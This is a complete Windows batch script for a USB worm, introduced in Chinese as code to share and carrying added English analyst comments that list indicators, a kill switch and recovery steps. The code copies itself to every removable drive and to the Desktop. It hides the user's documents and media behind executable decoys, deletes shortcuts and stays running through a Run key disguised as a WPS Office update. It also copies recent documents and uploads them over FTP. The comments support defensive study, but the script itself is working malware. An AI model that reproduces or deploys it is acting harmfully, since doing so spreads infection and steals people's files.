话不多说 直接上代码
主程序代码
@echo off&setlocal enabledelayedexpansion
::================================================================================================================
:: ANALYST ANNOTATION (defensive review). The commands below are left byte-identical; only comments were added
:: or translated. Comment lines avoid percent, exclamation and caret characters on purpose so they cannot be
:: expanded by cmd.exe, and all added comments sit outside parenthesised blocks.
::
:: What this script is: a self-propagating Windows batch worm for removable media. Observed behaviour:
::   1. Installs itself under C:\$RECYCLE-BIN (a look-alike of the real C:\$Recycle.Bin) and marks the tree
::      system+hidden with attrib, so it is invisible under default Explorer settings.
::   2. Persists through the HKCU ...\CurrentVersion\Run value "WPS-Office更新" pointing at
::      C:\$RECYCLE-BIN\start.exe; the value is deleted and re-added on every loop iteration.
::   3. Forces Explorer to hide hidden/system files and file extensions (Hidden=0, HideFileExt=1,
::      ShowSuperHidden=0) so the ".exe" decoys created below look like the originals.
::   4. Collects recently modified .docx/.doc/.rtf files from every drive into
::      C:\$RECYCLE-BIN\Cloud_synchronization and uploads them with ftp.exe, driven by a plaintext command
::      script written to C:\$RECYCLE-BIN\Winre.wim (the name mimics the Windows Recovery image).
::   5. For every drive letter other than C (A, B, D to Z): copies start.exe and the .stl payload files to
::      X:\$RECYCLE-BIN\Wpsupdater, deletes every .lnk on the drive, hides every document/media/archive file
::      and writes a same-name ".exe" decoy beside it, hides top-level folders and writes a "folder.exe"
::      decoy for each, then drops two lure executables. The same is then done to the user's Desktop.
::   6. Loops forever (goto str) using ping as a sleep.
::
:: Host-based indicators that appear verbatim in this file:
::   - Directories: C:\$RECYCLE-BIN, C:\$RECYCLE-BIN\Wpsupdater, C:\$RECYCLE-BIN\Cloud_synchronization,
::     one-letter marker directories C:\$RECYCLE-BIN\a .. \z, and X:\$RECYCLE-BIN on removable media.
::   - Files: start.exe, Wpsupdater.exe (referenced, never installed here), dd/de/dmo/dmu/dph/dpp/dt/dz.stl,
::     Winre.wim (an FTP command script, not a WIM image), the two lure files with Chinese names.
::   - Registry: Run value "WPS-Office更新"; Explorer\Advanced Hidden, HideFileExt, ShowSuperHidden rewrites.
::   - Process telemetry: cmd.exe spawning "dir /s /b" over whole volumes, repeated "taskkill /f /t /im
::     update.exe", "FTP -s:... -i", mass "attrib +s +a +h" on user documents, deletion of all .lnk files.
::   - Network: cleartext FTP (credentials and document contents are visible on the wire).
::
:: Built-in kill switch (grounded in the checks below): the install stage and the Desktop stage are skipped when
:: the directory C:\Developer-Certificate\USB-hacker exists, and a removable drive is skipped when
:: X:\Developer-Certificate\USB-hacker exists on it. Creating those directories is a cheap inoculation against
:: this specific sample; it does not replace removing the Run value and the C:\$RECYCLE-BIN tree.
::
:: Recovery note: the script never deletes user documents, it only hides them (attrib +s +a +h) and writes a
:: decoy ".exe" next to each; "attrib -s -a -h" restores visibility and the ".exe" copies are payload, not data.
:: Shortcut (.lnk) files on removable drives and on the Desktop are genuinely deleted, and any .exe of exactly
:: 100616 bytes is killed and deleted as a "competitor".
::================================================================================================================
echo "%~sd0%~p0%~n0"
::----------------------------------------------------------------------------------------------------------------
::Determine own location and open a folder: unless already running from the install directory or from
::System32, create a folder named like this script next to it, open it in Explorer, and mark it hidden+system.
::(The tilde expansions below resolve to this script's own drive, path and base name.)
if /i not "%~d0%~p0" == "C:\$RECYCLE-BIN\" (
if /i not "%~d0%~p0" == "C:\Windows\System32\" (
md "%~sd0%~p0%~n0"
explorer "%~sd0%~p0%~n0"
attrib +s +a +h "%~sd0%~p0%~n0"
)
)
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Hide own root directory on the current drive (when launched as a startup item this is the C: install dir).
::Defender note: "dir /a" or "attrib" still lists the directory; only default Explorer views hide it.
attrib +s +a +h "%~d0\$RECYCLE-BIN"
::----------------------------------------------------------------------------------------------------------------
::Check the developer marker, determine own location, install.
::On some systems the working location after autostart may become "C:\Windows\System32\".
::Kill switch: this whole install block is skipped when C:\Developer-Certificate\USB-hacker exists.
if /i not exist "C:\Developer-Certificate\USB-hacker" (
::First remove a specific other program (update.exe), "to free up space on C:".
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
::-------------------------------------------------------------------------------------------------------------
::Install: copy the .stl payload files from the source drive into C:\$RECYCLE-BIN\Wpsupdater.
md C:\$RECYCLE-BIN\Wpsupdater
attrib +s +a +h C:\$RECYCLE-BIN
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "C:\$RECYCLE-BIN\Wpsupdater\"
::--------------------------------------------------------------------------------------------------------------
::Re-register the startup entry (HKCU Run, value "WPS-Office更新") and change hidden-file visibility settings.
Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
)
::----------------------------------------------------------------------------------------------------------------
::Hand-off: when not running as C:\$RECYCLE-BIN\start and not from System32, install start.exe on C: (if not
::already there), launch the installed copy, and exit this instance. Only the installed copy reaches the loop.
if /i not "%~sd0%~p0%~n0" == "C:\$RECYCLE-BIN\start" (
if /i not "%~d0%~p0" == "C:\Windows\System32\" (
if /i not exist "C:\$RECYCLE-BIN\start.exe" (
copy /y "%~d0\$RECYCLE-BIN\start.exe" "C:\$RECYCLE-BIN\"
start /d "C:\$RECYCLE-BIN\" start.exe
)
::----------------------------------------------------------------------------------------------------------
::Task done, exit.
exit
)
)
::----------------------------------------------------------------------------------------------------------------
::After boot, execution falls through to here; when not started at boot, nothing below runs.
::Targeted removal of the other program; only C: for now "to avoid interference", other drives later.
::The loop below enumerates every .exe on C: and kills/deletes any file whose size is exactly 100616 bytes.
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
for /f "delims=" %%g in ('dir/s/b C:\*.exe') do (
if %%~zg == 100616 (
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
taskkill /f /t /im %%~ng.exe
del "%%g"
)
)
::Clear own cache (the exfiltration staging directory).
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Initialise FTP script; search for documents and build the upload set.
::Winre.wim is an ftp.exe command script: server, user, password, "bin", then "mput" and "bye" are appended
::below. The three Chinese words written here are the author's placeholders for server/account/password; in a
::live sample they are plaintext credentials and can be recovered from the file or from the FTP session.
del C:\$RECYCLE-BIN\Winre.wim /q
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
md C:\$RECYCLE-BIN\Cloud_synchronization
attrib +s +h +a C:\$RECYCLE-BIN\Cloud_synchronization
echo open ftp域名 > C:\$RECYCLE-BIN\Winre.wim
echo ftp账号>>C:\$RECYCLE-BIN\Winre.wim
echo 密码>>C:\$RECYCLE-BIN\Winre.wim
echo bin>>C:\$RECYCLE-BIN\Winre.wim
::Document collection over all drive letters A to Z (C included here) for .docx/.doc/.rtf.
::For each hit, the file's modification timestamp and the current date/time are split on "/", "-", ":" and
::space, and the two inner set /a lines compute the age in minutes (day-number formula times 1440 plus
::hours and minutes; the "1xx" minus 100 trick strips leading zeros). Files no older than 4320 minutes
::(3 days) are staged for upload, plus every matching file on the Desktop.
::NOTE(review): the token split assumes a date/time format with those separators; behaviour on other
::locale formats is not visible here.
set da=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dc=.docx,.doc,.rtf
for %%f in (%da%) do (
if exist "%%f:\" (
for %%h in (%dc%) do (
for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do (
for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do (
set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100
set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1"
if !f! leq 4320 (
copy /y "%%g" "C:\$RECYCLE-BIN\Cloud_synchronization\"
)
)
)
copy /y "%userprofile%\Desktop\*%%h" "C:\$RECYCLE-BIN\Cloud_synchronization\"
)
)
)
echo mput "C:\$RECYCLE-BIN\Cloud_synchronization\*" >>C:\$RECYCLE-BIN\Winre.wim
echo bye >>C:\$RECYCLE-BIN\Winre.wim
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Initialise parameters. Note that "da" now omits c, so the propagation loop never touches the C: drive.
::Each d* list is an extension set paired with the same-named .stl payload (dd.stl for documents, etc.).
set da=a,b,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dd=.doc,.docx,.dot,.dotx
set de=.xls,.xlsx
set dmo=.mp4,.flv,.rmvb,.mpj,.mpg,.avi,.m4a,.mkv,.mov,.vob,.swf,.mpeg,.webm,.wmv,.3gp
set dmu=.mp3,.m4a,.cd,.ogg,.asf,.wma,.wav,.mp3pro,.rm,.real,.ape,.module,.midi,.vqf,.audible,.flac,.vbr
set dph=.jpg,.bmp,.tga,.tif,.psd
set dpp=.ppt,.pot,.pps,.sldx
set dt=.txt
set dz=.rar,.7z,.zip
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Clear the "already attacked" markers (C:\$RECYCLE-BIN\a .. \z), working around an unknown bug.
for %%f in (%da%) do (
rd /s /q "C:\$RECYCLE-BIN\%%f"
md "C:\$RECYCLE-BIN\c"
)
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Initialisation done; start the main loop over drives A,B,D to Z. The program loops from here.
::Per drive X that exists, has no marker C:\$RECYCLE-BIN\X yet, and has no X:\Developer-Certificate\USB-hacker:
::  - copy start.exe and the .stl files to X:\$RECYCLE-BIN\Wpsupdater and hide that tree;
::  - kill/delete any .exe of exactly 100616 bytes on the drive;
::  - delete every .lnk on the drive;
::  - for each extension set, hide every matching file and write the paired .stl beside it as "name.ext.exe";
::  - drop a video-named lure .exe in the drive root;
::  - enumerate the root into wj1..wjN, and for every entry whose attribute string starts with "d" (a
::    directory) hide it and write start.exe as "name.exe" beside it; then drop a folder-named lure .exe;
::  - rewrite the Explorer visibility values, sleep about 3 s via ping, and create the marker directory.
:str
for %%f in (%da%) do (
if exist "%%f:\" (
if /i not exist "C:\$RECYCLE-BIN\%%f" (
if /i not exist "%%f:\Developer-Certificate\USB-hacker" (
::--------------------------------------------------------------------------------------------------------
::Begin self-replication.
md %%f:\$RECYCLE-BIN\Wpsupdater
attrib +s +h +a "%%f:\$RECYCLE-BIN"
attrib +s +h +a "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\start.exe" "%%f:\$RECYCLE-BIN\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\"
::Remove the other program while here, "being a good person".
for /f "delims=" %%g in ('dir/s/b %%f:\*.exe') do (
if %%~zg == 100616 (
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
taskkill /f /t /im %%~ng.exe
del "%%g"
)
)
::--------------------------------------------------------------------------------------------------------
::Start creating decoy files, hide the originals, delete shortcuts (shortcuts are often used to get around the virus, so remove them).
for /f "tokens=*" %%d in ('dir /s/b %%f:\*lnk') do (
del "%%d"
)
for %%h in (%dd%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%d.exe"
)
)
for %%h in (%de%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%d.exe"
)
)
for %%h in (%dmo%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%d.exe"
)
)
for %%h in (%dmu%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%d.exe"
)
)
for %%h in (%dph%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%d.exe"
)
)
for %%h in (%dpp%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%d.exe"
)
)
for %%h in (%dt%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%d.exe"
)
)
for %%h in (%dz%) do (
for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dz.stl" "%%d.exe"
)
)
::--------------------------------------------------------------------------------------------------------
::Drop lure file.
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\伪视频文件,诱导用.avi.exe"
::--------------------------------------------------------------------------------------------------------
for /f "delims=" %%a in ('dir /b "%%f:\"') do (
set /a n+=1
set "wj!n!=%%a"
for /f "tokens=1* delims==" %%a in ('set wj') do (
echo "%%b"
for %%i in ("%%f:\%%b") do (
set stc=%%~ai
if "!stc:~0,1!"=="d" (
echo "%%i 是文件夹"
attrib +s +a +h "%%f:\%%b"
copy /y "C:\$RECYCLE-BIN\start.exe" "%%f:\%%b.exe"
)
)
)
)
)
copy /y "C:\$RECYCLE-BIN\Wpsupdater.exe" "%%f:\伪文件夹,诱导用.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
ping -n 4 127.1 >nul
::Create the "already attacked" marker.
md C:\$RECYCLE-BIN\%%f
)
)
)
)
::----------------------------------------------------------------------------------------------------------------
::At the cost of code brevity, work around the unknown bug again: drop the marker for every drive letter that
::is not currently present, so media that is removed and re-inserted is processed again on the next pass.
for %%f in (%da%) do (
if /i not exist "%%f:\" (
rd /s /q "C:\$RECYCLE-BIN\%%f"
)
)
::----------------------------------------------------------------------------------------------------------------
::Start attacking the Desktop. Same steps as for a removable drive, applied to the current user's Desktop, and
::skipped entirely when C:\Developer-Certificate\USB-hacker exists. This block runs on every loop pass.
if /i not exist "C:\Developer-Certificate\USB-hacker" (
::Remove the other program while here, "being a good person".
for /f "delims=" %%g in ('dir/s/b %userprofile%\Desktop\*.exe') do (
if %%~zg == 100616 (
taskkill /f /t /im update.exe
del "%USERPROFILE%\AppData\Local\Start\update.exe"
rd /s /q "%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320"
taskkill /f /t /im %%~ng.exe
del "%%g"
)
)
::--------------------------------------------------------------------------------------------------------------
::Start creating decoy files, hide the originals.
for %%h in (%dd%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%d.exe"
)
)
for %%h in (%de%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%d.exe"
)
)
for %%h in (%dmo%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%d.exe"
)
)
for %%h in (%dmu%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%d.exe"
)
)
for %%h in (%dph%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%d.exe"
)
)
for %%h in (%dpp%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%d.exe"
)
)
for %%h in (%dt%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%d.exe"
)
)
for %%h in (%dz%) do (
for /f "tokens=*" %%d in ('dir /s/b %userprofile%\Desktop\*%%h') do (
attrib +s +a +h "%%d"
copy /y "C:\$RECYCLE-BIN\Wpsupdater\dz.stl" "%%d.exe"
)
)
for /f "delims=" %%a in ('dir /b "%userprofile%\Desktop\"') do (
set /a n+=1
set "wj!n!=%%a"
for /f "tokens=1* delims==" %%a in ('set wj') do (
echo "%%b"
for %%i in ("%userprofile%\Desktop\%%b") do (
set stc=%%~ai
if "!stc:~0,1!"=="d" (
echo "%%i 是文件夹"
attrib +s +a +h "%userprofile%\Desktop\%%b"
copy /y "C:\$RECYCLE-BIN\start.exe" "%userprofile%\Desktop\%%b.exe"
)
)
)
)
)
copy /y "C:\$RECYCLE-BIN\Wpsupdater.exe" "%userprofile%\Desktop\伪文件夹,诱导用.exe"
del "%userprofile%\Desktop\Wpsupdater.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f
ping -n 4 127.1 >nul
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Sync documents again: rebuild the list and the FTP script. Runs only when Winre.wim was consumed (deleted)
::by a previous successful upload. Same age arithmetic as above, but the window is now 3 minutes, so each
::loop pass stages only documents changed since the previous pass.
if /i not exist "C:\$RECYCLE-BIN\Winre.wim" (
echo open FTP服务器域名 > C:\$RECYCLE-BIN\Winre.wim
echo ftp账号>>C:\$RECYCLE-BIN\Winre.wim
echo 密码>>C:\$RECYCLE-BIN\Winre.wim
echo bin>>C:\$RECYCLE-BIN\Winre.wim
set da=a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
set dc=.docx,.doc,.rtf
for %%f in (%da%) do (
if exist "%%f:\" (
for %%h in (%dc%) do (
for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do (
for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do (
set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100
set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1"
if !f! leq 3 (
copy /y "%%g" "C:\$RECYCLE-BIN\Cloud_synchronization\"
)
)
)
)
)
)
)
echo mput "C:\$RECYCLE-BIN\Cloud_synchronization\*" >>C:\$RECYCLE-BIN\Winre.wim
echo bye >>C:\$RECYCLE-BIN\Winre.wim
::----------------------------------------------------------------------------------------------------------------
::Re-register the startup entry again, to survive removal. The Run value is deleted and re-added on every pass;
::a defender who removes the value must also stop the running start.exe, or it returns within seconds.
::The ping afterwards is a sleep of roughly 15 seconds.
Reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d C:\$RECYCLE-BIN\start.exe /f
ping -n 16 127.1 >nul
::----------------------------------------------------------------------------------------------------------------
::----------------------------------------------------------------------------------------------------------------
::Actual FTP upload: a ping to the server acts as the reachability check; on success ftp.exe runs the command
::script non-interactively (-s, -i), the staging directory is recreated empty and the script file is deleted
::(which re-arms the "sync again" block above). On ping failure only FTP_error is echoed and nothing is sent.
if exist "C:\$RECYCLE-BIN\Winre.wim" (
@ping FTP服务器域名&&(
echo FTP_OK
FTP -s:C:\$RECYCLE-BIN\Winre.wim -i
rd /s /q "C:\$RECYCLE-BIN\Cloud_synchronization"
md C:\$RECYCLE-BIN\Cloud_synchronization
attrib +s +h +a "C:\$RECYCLE-BIN\Cloud_synchronization"
del "C:\$RECYCLE-BIN\Winre.wim"
)||echo FTP_error
)
::----------------------------------------------------------------------------------------------------------------
::Jump back to the main loop; the script never terminates on its own.
goto str |
|